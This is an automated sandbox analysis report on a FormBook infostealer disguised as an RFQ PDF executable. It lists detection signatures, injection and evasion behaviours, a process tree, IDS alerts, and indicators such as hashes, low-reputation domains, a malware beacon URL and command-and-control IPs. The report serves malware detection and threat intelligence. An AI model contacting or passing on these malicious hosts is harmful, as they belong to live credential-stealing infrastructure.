Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe

Overview

General Information

Sample name:RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe
Analysis ID:1630658
MD5:65d64907c8be500d82a8a03c2f42bec4
SHA1:de18e2ce392bf0651a8f0a3030d2bba28e084ae2
SHA256:3aecf8c7d1e006f5477e23a28d9bdcc457d1518cad2f713c4ac8025136fdaf32
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Process Tree

  • System is w10x64
  • RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe" MD5: 65D64907C8BE500D82A8A03C2F42BEC4)
    • svchost.exe (PID: 7684 cmdline: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • 7eCxfcmGdXWQyF2L.exe (PID: 560 cmdline: "C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\BfQp9CIcKuOSt.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • mfpmp.exe (PID: 7740 cmdline: "C:\Windows\SysWOW64\mfpmp.exe" MD5: 9CD65F38A2B4E53E8180395DE4988D6A)
          • 7eCxfcmGdXWQyF2L.exe (PID: 5756 cmdline: "C:\Program Files (x86)\OWkeJIcKlbHnGVVUKjcdeqILcdWfHXlTgfwFnHdGpnpGuXcxatPTWcal\pFnDUdteTm.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7316 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.1848742069.0000000002620000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1849026159.0000000002E90000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000003.00000002.4180631001.0000000002B10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.4181549221.0000000002F90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.4183518506.0000000005370000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe", CommandLine: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe", ParentImage: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, ParentProcessId: 7664, ParentProcessName: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe", ProcessId: 7684, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe", CommandLine: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe", ParentImage: C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, ParentProcessId: 7664, ParentProcessName: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe", ProcessId: 7684, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-06T05:41:28.593665+010028554651A Network Trojan was detected192.168.2.449734198.2.236.22180TCP
            2025-03-06T05:41:52.753932+010028554651A Network Trojan was detected192.168.2.44974013.248.169.4880TCP
            2025-03-06T05:42:06.508860+010028554651A Network Trojan was detected192.168.2.4497775.134.116.20180TCP
            2025-03-06T05:42:25.620358+010028554651A Network Trojan was detected192.168.2.44982213.228.81.3980TCP
            2025-03-06T05:43:18.041846+010028554651A Network Trojan was detected192.168.2.449859104.21.32.180TCP
            2025-03-06T05:43:31.327313+010028554651A Network Trojan was detected192.168.2.449968209.74.64.5880TCP
            2025-03-06T05:43:47.817037+010028554651A Network Trojan was detected192.168.2.450003199.59.243.22880TCP
            2025-03-06T05:44:01.759371+010028554651A Network Trojan was detected192.168.2.450032208.91.197.2780TCP
            2025-03-06T05:44:15.994927+010028554651A Network Trojan was detected192.168.2.45006247.83.1.9080TCP
            2025-03-06T05:44:29.694366+010028554651A Network Trojan was detected192.168.2.450073192.186.58.3180TCP
            2025-03-06T05:44:43.544878+010028554651A Network Trojan was detected192.168.2.450077199.59.243.16080TCP
            2025-03-06T05:44:57.159152+010028554651A Network Trojan was detected192.168.2.450081188.114.96.380TCP
            2025-03-06T05:45:10.689661+010028554651A Network Trojan was detected192.168.2.45008513.248.169.4880TCP
            2025-03-06T05:45:25.037503+010028554651A Network Trojan was detected192.168.2.45008947.83.1.9080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-06T05:41:45.222431+010028554641A Network Trojan was detected192.168.2.44973513.248.169.4880TCP
            2025-03-06T05:41:46.723487+010028554641A Network Trojan was detected192.168.2.44973713.248.169.4880TCP
            2025-03-06T05:41:49.267536+010028554641A Network Trojan was detected192.168.2.44973813.248.169.4880TCP
            2025-03-06T05:41:58.795265+010028554641A Network Trojan was detected192.168.2.4497505.134.116.20180TCP
            2025-03-06T05:42:01.401399+010028554641A Network Trojan was detected192.168.2.4497575.134.116.20180TCP
            2025-03-06T05:42:04.041312+010028554641A Network Trojan was detected192.168.2.4497675.134.116.20180TCP
            2025-03-06T05:42:17.956861+010028554641A Network Trojan was detected192.168.2.44980113.228.81.3980TCP
            2025-03-06T05:42:20.513544+010028554641A Network Trojan was detected192.168.2.44980813.228.81.3980TCP
            2025-03-06T05:42:23.020818+010028554641A Network Trojan was detected192.168.2.44981513.228.81.3980TCP
            2025-03-06T05:42:32.421460+010028554641A Network Trojan was detected192.168.2.449839104.21.32.180TCP
            2025-03-06T05:42:34.982842+010028554641A Network Trojan was detected192.168.2.449847104.21.32.180TCP
            2025-03-06T05:42:37.530626+010028554641A Network Trojan was detected192.168.2.449853104.21.32.180TCP
            2025-03-06T05:43:23.685296+010028554641A Network Trojan was detected192.168.2.449949209.74.64.5880TCP
            2025-03-06T05:43:26.225429+010028554641A Network Trojan was detected192.168.2.449955209.74.64.5880TCP
            2025-03-06T05:43:28.771770+010028554641A Network Trojan was detected192.168.2.449962209.74.64.5880TCP
            2025-03-06T05:43:39.829485+010028554641A Network Trojan was detected192.168.2.449985199.59.243.22880TCP
            2025-03-06T05:43:42.378341+010028554641A Network Trojan was detected192.168.2.449991199.59.243.22880TCP
            2025-03-06T05:43:45.162648+010028554641A Network Trojan was detected192.168.2.449997199.59.243.22880TCP
            2025-03-06T05:43:53.597933+010028554641A Network Trojan was detected192.168.2.450014208.91.197.2780TCP
            2025-03-06T05:43:56.152319+010028554641A Network Trojan was detected192.168.2.450020208.91.197.2780TCP
            2025-03-06T05:43:58.720545+010028554641A Network Trojan was detected192.168.2.450026208.91.197.2780TCP
            2025-03-06T05:44:08.374697+010028554641A Network Trojan was detected192.168.2.45004647.83.1.9080TCP
            2025-03-06T05:44:10.955877+010028554641A Network Trojan was detected192.168.2.45005247.83.1.9080TCP
            2025-03-06T05:44:13.514757+010028554641A Network Trojan was detected192.168.2.45005847.83.1.9080TCP
            2025-03-06T05:44:21.956443+010028554641A Network Trojan was detected192.168.2.450070192.186.58.3180TCP
            2025-03-06T05:44:24.525089+010028554641A Network Trojan was detected192.168.2.450071192.186.58.3180TCP
            2025-03-06T05:44:27.060845+010028554641A Network Trojan was detected192.168.2.450072192.186.58.3180TCP
            2025-03-06T05:44:35.887843+010028554641A Network Trojan was detected192.168.2.450074199.59.243.16080TCP
            2025-03-06T05:44:38.436753+010028554641A Network Trojan was detected192.168.2.450075199.59.243.16080TCP
            2025-03-06T05:44:40.987217+010028554641A Network Trojan was detected192.168.2.450076199.59.243.16080TCP
            2025-03-06T05:44:49.525944+010028554641A Network Trojan was detected192.168.2.450078188.114.96.380TCP
            2025-03-06T05:44:52.073374+010028554641A Network Trojan was detected192.168.2.450079188.114.96.380TCP
            2025-03-06T05:44:54.635363+010028554641A Network Trojan was detected192.168.2.450080188.114.96.380TCP
            2025-03-06T05:45:03.718826+010028554641A Network Trojan was detected192.168.2.45008213.248.169.4880TCP
            2025-03-06T05:45:05.222327+010028554641A Network Trojan was detected192.168.2.45008313.248.169.4880TCP
            2025-03-06T05:45:09.034929+010028554641A Network Trojan was detected192.168.2.45008413.248.169.4880TCP
            2025-03-06T05:45:17.208112+010028554641A Network Trojan was detected192.168.2.45008647.83.1.9080TCP
            2025-03-06T05:45:19.813827+010028554641A Network Trojan was detected192.168.2.45008747.83.1.9080TCP
            2025-03-06T05:45:22.358010+010028554641A Network Trojan was detected192.168.2.45008847.83.1.9080TCP
            2025-03-06T05:45:31.916218+010028554641A Network Trojan was detected192.168.2.450090103.117.135.1380TCP
            2025-03-06T05:45:34.451090+010028554641A Network Trojan was detected192.168.2.450091103.117.135.1380TCP
            2025-03-06T05:45:36.954518+010028554641A Network Trojan was detected192.168.2.450092103.117.135.1380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.gnlokn.info/885u/Avira URL Cloud: Label: malware
            Source: http://www.gnlokn.info/885u/?QbzttZ=kNxcGR7XN/wYLGhj0d40FNCoMf+x/Rmx2a61waUV9eq+B84u7QLL02qOOmWf364spvjPkSimP8HalDvEWAtD0KGnhG4qjomhncuJEZvdLWIPARX2Sc10D6U=&TL58F=YzjHAvira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeReversingLabs: Detection: 44%
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeVirustotal: Detection: 50%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 00000001.00000002.1848742069.0000000002620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849026159.0000000002E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4180631001.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4181549221.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4183518506.0000000005370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4181501421.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849454850.0000000003600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4181594224.00000000025A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: MFPMP.pdb source: svchost.exe, 00000001.00000003.1816537651.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1816611122.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1816626743.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000002.00000003.1786946064.00000000008D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdbUGP source: svchost.exe, 00000001.00000003.1816537651.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1816611122.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1816626743.0000000002A24000.00000004.00000020.00020000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000002.00000003.1786946064.00000000008D4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1721005200.0000000003990000.00000004.00001000.00020000.00000000.sdmp, RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1719916318.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753780868.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1752145219.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849063583.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849063583.000000000319E000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.1851818515.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.1849172802.0000000003026000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4181813137.000000000351E000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4181813137.0000000003380000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1721005200.0000000003990000.00000004.00001000.00020000.00000000.sdmp, RFQ - 1239- PERSIAN GULF BIDBOLAND PDH PROJECT-PDF.exe, 00000000.00000003.1719916318.0000000003AE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1753780868.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1752145219.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849063583.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849063583.000000000319E000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.1851818515.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000003.1849172802.0000000003026000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4181813137.000000000351E000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4181813137.0000000003380000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4182184058.00000000039AC000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000000.1927508589.0000000002F3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2147066746.000000003ED0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mfpmp.exe, 00000003.00000002.4180786413.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000003.00000002.4182184058.00000000039AC000.00000004.10000000.00040000.00000000.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000000.1927508589.0000000002F3C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2147066746.000000003ED0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 7eCxfcmGdXWQyF2L.exe, 00000002.00000000.1770561912.000000000027F000.00000002.00000001.01000000.00000004.sdmp, 7eCxfcmGdXWQyF2L.exe, 00000009.00000002.4180628766.000000000027F000.00000002.00000001.01000000.00000004.sdmp

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49740 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 5.134.116.201:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49735 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49734 -> 198.2.236.221:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 5.134.116.201:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49757 -> 5.134.116.201:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49777 -> 5.134.116.201:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49801 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49808 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49822 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49815 -> 13.228.81.39:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49839 -> 104.21.32.1:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49847 -> 104.21.32.1:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49949 -> 209.74.64.58:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49853 -> 104.21.32.1:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49955 -> 209.74.64.58:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49859 -> 104.21.32.1:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49962 -> 209.74.64.58:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49985 -> 199.59.243.228:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50003 -> 199.59.243.228:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49968 -> 209.74.64.58:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50014 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49991 -> 199.59.243.228:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50070 -> 192.186.58.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49997 -> 199.59.243.228:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50071 -> 192.186.58.31:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50073 -> 192.186.58.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50074 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50075 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50089 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50072 -> 192.186.58.31:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50080 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50082 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50091 -> 103.117.135.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50078 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50088 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50085 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50084 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50062 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50092 -> 103.117.135.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50076 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 208.91.197.27:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50087 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50077 -> 199.59.243.160:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50086 -> 47.83.1.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50079 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50081 -> 188.114.96.3:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50090 -> 103.117.135.13:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50083 -> 13.248.169.48:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.berkilau.xyz
            Source: DNS query: www.limiles.xyz
            Source: DNS query: www.menekankan.xyz
            Source: DNS query: www.uarsg.xyz
            Source: Joe Sandbox ViewIP Address: 198.2.236.221 198.2.236.221
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
